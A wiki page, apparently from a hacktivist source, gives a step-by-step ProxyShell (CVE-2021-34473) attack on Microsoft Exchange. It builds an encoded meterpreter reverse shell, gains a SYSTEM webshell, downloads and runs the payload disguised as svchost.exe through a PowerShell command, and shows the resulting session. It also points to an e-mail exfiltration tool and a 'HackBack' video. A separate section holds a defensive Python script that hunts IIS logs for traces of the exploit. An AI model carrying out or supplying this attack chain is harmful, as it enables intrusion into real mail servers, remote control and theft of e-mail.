Proxyshell
Latest revision as of 08:14, 27 November 2023
Exploiting proxyshell - CVE-2021-34473
- (Book) Mastering Metasploit: Exploit systems, cover your tracks, and bypass security controls with the Metasploit 5.0 framework, 4th Edition
I found that using exploit/windows/http/exchange_proxyshell_rce doesn't work, but proxyshell-auto (https://github.com/Udyz/proxyshell-auto) does for gaining RCE. Here we use both the exploit and a meterpreter to compromise vulnerable hosts.
Build meterpreter
First we make an implant to perform post exploitation using metasploit:
msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o meterpreter.exe
Now we set our listener in msfconsole:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 1.2.3.4
set LPORT 8888
run
Host the meterpreter binary for download over HTTP (from the directory containing meterpreter.exe):
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Gain a shell
We first run the proxyshell-auto exploit (https://github.com/Udyz/proxyshell-auto), which gives us a shell as NT AUTHORITY\SYSTEM if the Exchange PowerShell remoting endpoint is enabled on the server. ProxyShell chains CVE-2021-34473 (pre-auth path confusion in the Autodiscover front end) with CVE-2021-34523 (privilege elevation on the Exchange PowerShell backend) and CVE-2021-31207 (post-auth arbitrary file write); the run below ends with a webshell written under aspnet_client.
Gain a shell:
user@host:~$ python3 proxyshell-auto/proxyshell.py -t 10.10.10.11
fqdn srvexchange2016.domain.local
+ Administrator@domain.com
legacyDN /o=COMPANY/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cc84dab2b5f8407ea1545e2f024382aa-Administrator
leak_sid S-1-5-21-654894352-2732664023-2722231124-500
token VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBxBZG1pbmlzdHJhdGV1ckBwZWNoZXhwb3J0Lm1nVSxTLTEtNS0yMS02NTQ4OTQzNTItMjczMjY2NDAyMy0yNzIyMjMxMTI0LTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
set_ews Success with subject grvshwaveotkomvc
write webshell at aspnet_client/yhuzv.asPx
<Response [404]>
nt authority\system
SHELL>
From here we want to download the meterpreter payload for post exploitation (see PayloadsAllTheThings, Windows - Download and Execute: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md):
SHELL> powershell.exe Invoke-WebRequest -Uri "http://1.2.3.4:8000/meterpreter.exe" -OutFile "c:\Windows\Temp\svchost.exe"
With the multi/handler listener from above still running, we execute the payload from the webshell:
SHELL> powershell.exe "c:\windows\Temp\svchost.exe"
From here we will have a meterpreter connection to work from :)
[*] Started HTTPS reverse handler on https://1.2.3.4:8888
[*] https://1.2.3.4:8888 handling request from 10.10.10.11; (UUID: qdghnakk) Staging x86 payload (176732 bytes) ...
[*] Meterpreter session 1 opened (1.2.3.4:8888 -> 10.10.10.11:1984) at 2023-07-05 08:00:18 +0000
meterpreter > sysinfo
Computer        : srvexchange2016
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : DOMAIN
Logged On Users : 6
Meterpreter     : x86/windows
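The defender's counterpart to the whole procedure above, added here as an example and not code from the original page or from the proxyshell-auto project: a small Python hunt over IIS W3C logs that flags the Autodiscover path-confusion requests the exploit sends (a query of the form @domain/backend/?...&Email=autodiscover/autodiscover.json%3f@domain, where the segment after @domain/ is the backend the front end is tricked into forwarding to, such as /mapi/nspi/ or /powershell/) and any server-side page under /aspnet_client/, the folder where the run above dropped yhuzv.asPx. The log excerpt, the attacker address 203.0.113.7 and the domain evil.corp are constructed, and the X-Rps-CAT value is a placeholder standing in for the token the exploit prints.

```python
"""Hunt for ProxyShell (CVE-2021-34473) traces in IIS W3C extended logs."""
import re
from urllib.parse import unquote

# Constructed sample log (not the page's engagement data): a benign Autodiscover
# call, two path-confusion requests reaching different backends, one hit on a
# webshell under /aspnet_client and one legitimate static file from that folder.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-07-05 07:58:01 10.10.10.11 POST /Autodiscover/Autodiscover.xml - 443 DOMAIN\\jdoe 10.10.10.50 Microsoft+Office/16.0 200
2023-07-05 07:59:10 10.10.10.11 GET /autodiscover/autodiscover.json @evil.corp/mapi/nspi/?&Email=autodiscover/autodiscover.json%3f@evil.corp 443 - 203.0.113.7 python-requests/2.31.0 200
2023-07-05 07:59:12 10.10.10.11 POST /autodiscover/autodiscover.json @evil.corp/powershell/?X-Rps-CAT=PLACEHOLDER&Email=autodiscover/autodiscover.json%3F@evil.corp 443 - 203.0.113.7 python-requests/2.31.0 200
2023-07-05 08:00:02 10.10.10.11 POST /aspnet_client/yhuzv.asPx - 443 - 203.0.113.7 python-requests/2.31.0 200
2023-07-05 08:00:05 10.10.10.11 GET /aspnet_client/system_web/WebResource.js - 443 - 10.10.10.50 Mozilla/5.0 200
"""

# The request stem is always the Autodiscover JSON handler...
AUTODISCOVER_STEM = re.compile(r"^/autodiscover/autodiscover\.json$", re.I)
# ...and the exploit reflects that same path into the Email parameter: the
# front end cuts the Email value back out of the URL before forwarding, so
# only the attacker-chosen backend path survives.
EMAIL_REFLECTION = re.compile(r"email=autodiscover/autodiscover\.json", re.I)
# Text between the leading "@domain/" and the first "?" is the backend the
# front end is tricked into proxying to (/mapi/nspi/, /powershell/, /ews/...).
CONFUSED_BACKEND = re.compile(r"@[^/]+/([^?]*)")
# /aspnet_client ships only static client script files; a server-side page
# there is out of place and is where the exploit run above wrote its webshell.
ASPNET_CLIENT_PAGE = re.compile(r"^/aspnet_client/.*\.(aspx|ashx|asmx)$", re.I)


def parse_w3c(text):
    """Turn W3C extended log text into dicts keyed by the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        values = line.split()  # IIS encodes spaces inside fields as '+'
        if len(values) != len(fields):
            continue  # truncated line: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def detect(records):
    """Return (rule, client_ip, target, status) for each suspicious record."""
    findings = []
    for rec in records:
        stem = rec.get("cs-uri-stem", "")
        client = rec.get("c-ip", "-")
        status = rec.get("sc-status", "-")
        # Decode first: the exploit sends the inner '?' as %3f or %3F.
        query = unquote(rec.get("cs-uri-query", ""))
        if AUTODISCOVER_STEM.match(stem) and EMAIL_REFLECTION.search(query):
            m = CONFUSED_BACKEND.search(query)
            backend = "/" + m.group(1) if m else "(unparsed)"
            findings.append(("proxyshell-ssrf", client, backend, status))
        elif ASPNET_CLIENT_PAGE.match(stem):
            findings.append(("webshell-candidate", client, stem, status))
    return findings


if __name__ == "__main__":
    for finding in detect(parse_w3c(SAMPLE_LOG)):
        print(*finding)
```

Run against real logs by reading each u_ex*.log file into parse_w3c. Two design points matter in practice: the query is URL-decoded before matching, because the exploit encodes the inner question mark, and the backend segment is extracted so a /powershell/ hit (the step that precedes the webshell write) can be prioritised over a bare /mapi/nspi/ probe. The /aspnet_client rule is deliberately broad: the folder should never serve .aspx, so every match is worth pulling the file for review.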
E-mail exfiltration
For exfiltrating e-mails via proxyshell exploitation with Exchange_SSRF (https://github.com/Jumbo-WJB/Exchange_SSRF), see Guacamaya's tutorial HackBack video (https://enlacehacktivista.org/hackback2.webm).